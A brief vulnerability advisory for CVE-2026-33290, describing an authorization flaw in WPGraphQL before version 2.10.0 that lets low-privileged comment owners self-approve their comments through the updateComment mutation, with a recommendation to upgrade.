CVE-2026-33290

Name of the Vulnerable Software and Affected Versions WPGraphQL versions prior to 2.10.0

Description WPGraphQL has an authorization flaw in the updateComment functionality. An authenticated, low-privileged user, even one with no capabilities, can change the moderation status of their own comment to 'APPROVE' without having the moderate comments capability. This bypasses moderation workflows, allowing untrusted users to self-approve content. The issue stems from the authorization check in plugins/wp-graphql/src/Mutation/CommentUpdate.php being owner-based rather than field-based. Specifically, lines 92 and 99 allow the comment owner to update the status, even without moderation capabilities. The GraphQL input status is directly mapped to the WordPress comment approved field via plugins/wp-graphql/src/Data/CommentMutation.php:94:94 and persisted using wp update comment in plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120. The CommentStatusEnum in plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states. The updateComment API Endpoint allows modification of comment status using the status parameter. The status parameter, represented by the variable status, can be set to 'APPROVE' to bypass moderation.

Recommendations Update to WPGraphQL version 2.10.0 or later.